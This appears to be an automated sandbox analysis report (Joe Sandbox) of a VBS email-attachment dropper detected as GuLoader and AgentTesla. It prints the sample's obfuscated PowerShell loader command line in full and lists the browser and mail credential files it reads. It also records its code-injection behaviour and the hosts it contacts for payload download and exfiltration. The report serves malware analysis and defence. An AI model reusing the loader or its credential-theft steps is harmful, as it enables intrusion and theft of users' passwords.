e=afk.s$gratiddel,uy pigmr overlpreapgunpreema.kefsolbro ste runi,eepenumnpletsisamhrnnott,g yp,ies butnp lyrsmiss..melersdasylpnedfrlhyperi soilt,ibli(flykk$uncantmagi eckwyat agg.r owayaplyndpmodstov eskluninnaaa emrupbre1 skrk2fir k6brefr) ntyi ');rationaliseringsgevinsten (efterbevilget 'angel[kokkenfigure akkuttekst.midtls smiee oldsrwee dvstereikristcsrintecanceparitmostruki d.minsculltsansem esknastemmntzaamasidebgrodfseudranrle de]milit:de us:z,cchs archetr incselm uo munr ylofid tastfree
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#sildefdningerne retable tyranniserer kevutzoth slagterbutik udefineret billigelserne #>;$prokuraens='slgten';<#joblessness sejsingers elementarladningen disownable winterfeeding #>;$cheekbonesncavate=$saltometer+$host.ui; function efterbevilget($semihydrate){if ($cheekbonesncavate) {$phillipe++;}$teetotalism=$hunder+$semihydrate.'length'-$phillipe; for( $cheekbones=5;$cheekbones -lt $teetotalism;$cheekbones+=6){$bevillige=$cheekbones;$kirtimukha+=$semihydrate[$cheekbones];$zirian='delegant';}$kirtimukha;}function rationaliseringsgevinsten($herkan){ & ($sope) ($herkan);}$provokatr=efterbevilget 'pro ymfyrreononadz fodbi,lasult gnel wronaangam/ov.rn ';$provokatr+=efterbevilget ' sl f5makes.cloth0chi p emoti( tranws aciihutchngipsdd,onfio bl.gwkrimssshake mathinslarttomadr u vin1m rty0 over.cou.t0re,us; ira sapidwkommei i.fondoc,s6selsk4 mart;phleg abortxfyrre6facon4dist ;large and,brlrerfvpic l:fornj1 su.d3 jugo1super.semis0zoacu)ejerk byggega velesprgecbyghekkami,opolyp/betrd2relig0 marg1pusle0 n,vl0 mac 1remme0kompl1,tats sner fselvfi tvinrhamamejordbfconfoooplaexra pa/fgte 1thune3detal1har w.repro0.atbr ';$laulau=efterbevilget 'efterudihalssphageudklkrgrat,-polypatrknigbes,yeahnfen uldktforep ';$dyrlgeforeningens=efterbevilget 'ud,ejh ejertroejot jakopwheyfs inka: phil/subsk/ ubardbyldertotrii phervbabcoe kiss..elvoginhabof relogolligmel el stumeaffek.civ lctour ovolumm c.li/ vineulsn ncp epr?snigme.ruthxallmspsprayo witcrungratbo ga=bio hd ubtoran awsilicn d sil ,iseo ideeanonevdodont& nonwisolandk ist=katte1unsavmkomtezv.scumend ml fami1cyathucotesicocklzacetao lign-co prvpant.hnonlu3nilaszyusarm b,osz antecvejovpstderfco ciwhymencenkelyout,sh onses hardkarbejvjottik form3stere9sc ewgfon mlprofuymdt,a ';$tetrapolar126=efterbevilget 'wilbu>reinf ';$sope=efterbevilget ' sekuicensueund.rx knhj ';$mollycot46='leucochroic';$enteromegalia='\mejeriernes.pra';rationaliseringsgevinsten (efterbevilget 'ekspo$unsadginfralperidot ttob undiaunderldy,el:greenpplutelbro eadarticrenteekevilhkryddogisprlballodalko eintrar .osmsult a= a.pe$f atwebldagnfabriv unse:ringrakompepmeltwpopposdexa,caimpovtenredapalme+u.til$squ me chainnou etdeklae b.gsr i,dsotra.imluxemebr,acgstatialjpesl galaigrebeafun n ');rationaliseringsgevinsten (efterbevilget 'ind a$ nondgnattolkirkeobrys.bh mmeadet cls.bno: sa,bavajeefu wormb milaeditotce iltan itenonpodko,taefla e=afk.s$gratiddel,uy pigmr overlpreapgunpreema.kefsolbro ste runi,eepenumnpletsisamhrnnott,g yp,ies butnp lyrsmiss..melersdasylpnedfrlhyperi soilt,ibli(flykk$uncantmagi eckwyat agg.r owayaplyndpmodstov eskluninnaaa emrupbre1 skrk2fir k6brefr) ntyi ');rationaliseringsgevinsten (efterbevilget 'angel[kokkenfigure akkuttekst.midtls smiee oldsrwee dvstereikristcsrintecanceparitmostruki d.minsculltsansem esknastemmntzaamasidebgrodfseudranrle de]milit:de us:z,cchs archetr incselm uo munr ylofid tastfreeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3357530310.0000000024845000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3116, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: Yara matchFile source: 00000007.00000002.3357530310.0000000024845000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3357530310.0000000024845000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3116, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts121
              Windows Management Instrumentation              		221
              Scripting              		1
              DLL Side-Loading              		2
              Obfuscated Files or Information              		1
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Software Packing              		LSASS Memory23
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading              		Security Account Manager321
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Masquerading              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
              Virtualization/Sandbox Evasion              		LSA Secrets141
              Virtualization/Sandbox Evasion              		SSHKeylogging23
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Network Configuration Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540844 Sample: OUTSTANDING PAYMENT STATUS ... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 23 mail.ihcm.com.my 2->23 25 ip-api.com 2->25 27 3 other IPs or domains 2->27 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 7 other signatures 2->45 8 powershell.exe 15 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 47 Early bird code injection technique detected 8->47 49 Writes to foreign memory regions 8->49 51 Found suspicious powershell code related to unpacking or dynamic code loading 8->51 53 Queues an APC in another process (thread injection) 8->53 13 msiexec.exe 15 8 8->13         started        17 conhost.exe 8->17         started        55 VBScript performs obfuscated calls to suspicious functions 11->55 57 Suspicious powershell command line found 11->57 59 Wscript starts Powershell (via cmd or directly) 11->59 61 2 other signatures 11->61 19 powershell.exe 14 20 11->19         started        process6 dnsIp7 29 ip-api.com 208.95.112.1, 49909, 80 TUT-ASUS United States 13->29 31 mail.ihcm.com.my 202.71.109.165, 49935, 587 TMVADS-APTM-VADSDCHostingMY Malaysia 13->31 33 api.ipify.org 104.26.12.205, 443, 49902 CLOUDFLARENETUS United States 13->33 63 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 13->63 65 Tries to steal Mail credentials (via file / registry access) 13->65 67 Tries to harvest and steal browser information (history, passwords, etc) 13->67 69 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 13->69 35 drive.google.com 142.250.185.238, 443, 49704, 49705 GOOGLEUS United States 19->35 37 drive.usercontent.google.com 142.250.186.65, 443, 49706, 49881 GOOGLEUS United States 19->37 71 Found suspicious powershell code related to unpacking or dynamic code loading 19->71 21 conhost.exe 19->21         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              OUTSTANDING PAYMENT STATUS 01199241024.vbs21%ReversingLabsScript.Trojan.GuLoader

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://api.ipify.org/0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://api.ipify.org/t0%URL Reputationsafe
              https://api.ipify.org0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              http://ip-api.com0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              mail.ihcm.com.my
              		202.71.109.165
              		truetrue
                		unknown
                drive.google.com
                		142.250.185.238
                		truefalse
                  		unknown
                  drive.usercontent.google.com
                  		142.250.186.65
                  		truefalse
                    		unknown
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		unknown
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                        • URL Reputation: safe
                        		unknown
                        http://ip-api.com/line/?fields=hostingfalse
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2260354457.0000011F9B21F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADEC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://ocsp.sectigo.com0msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://drive.usercontent.googh(Lopowershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://go.micropowershell.exe, 00000002.00000002.2260354457.0000011F99F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://drive.googPpowershell.exe, 00000002.00000002.2260354457.0000011F9B14E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://drive.google.compowershell.exe, 00000002.00000002.2260354457.0000011F9B14E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.ipify.org/tmsiexec.exe, 00000007.00000002.3357530310.00000000247E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.google.compowershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://api.ipify.orgmsiexec.exe, 00000007.00000002.3357530310.00000000247E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0msiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://ip-api.commsiexec.exe, 00000007.00000002.3357530310.0000000024831000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://aka.ms/pscore6lBjqpowershell.exe, 00000005.00000002.2461640765.0000000004631000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://drive.google.compowershell.exe, 00000002.00000002.2260354457.0000011F9B14E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F99258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9A994000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9B21F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2260354457.0000011F99031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://apis.google.compowershell.exe, 00000002.00000002.2260354457.0000011F994CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F994B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2260354457.0000011F9ADD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://mail.ihcm.com.mymsiexec.exe, 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2260354457.0000011F99031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461640765.0000000004631000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3357530310.00000000247E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://drive.usercontent.google.com3Soupowershell.exe, 00000002.00000002.2260354457.0000011F994CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      208.95.112.1
                                                      		ip-api.comUnited States
                                                      		53334TUT-ASUStrue
                                                      104.26.12.205
                                                      		api.ipify.orgUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      202.71.109.165
                                                      		mail.ihcm.com.myMalaysia
                                                      		17971TMVADS-APTM-VADSDCHostingMYtrue
                                                      142.250.185.238
                                                      		drive.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      142.250.186.65
                                                      		drive.usercontent.google.comUnited States
                                                      		15169GOOGLEUSfalse

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1540844
                                                      Start date and time:2024-10-24 08:45:15 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 42s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:OUTSTANDING PAYMENT STATUS 01199241024.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@8/7@7/5
                                                      EGA Information:
                                                      • Successful, ratio: 33.3%
                                                      HCA Information:
                                                      • Successful, ratio: 85%
                                                      • Number of executed functions: 79
                                                      • Number of non-executed functions: 22
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 4508 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6800 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: OUTSTANDING PAYMENT STATUS 01199241024.vbs

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      02:46:10API Interceptor122x Sleep call for process: powershell.exe modified
                                                      02:47:03API Interceptor115612x Sleep call for process: msiexec.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      208.95.112.1Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • ip-api.com/json/?fields=status,country,regionName,city,query
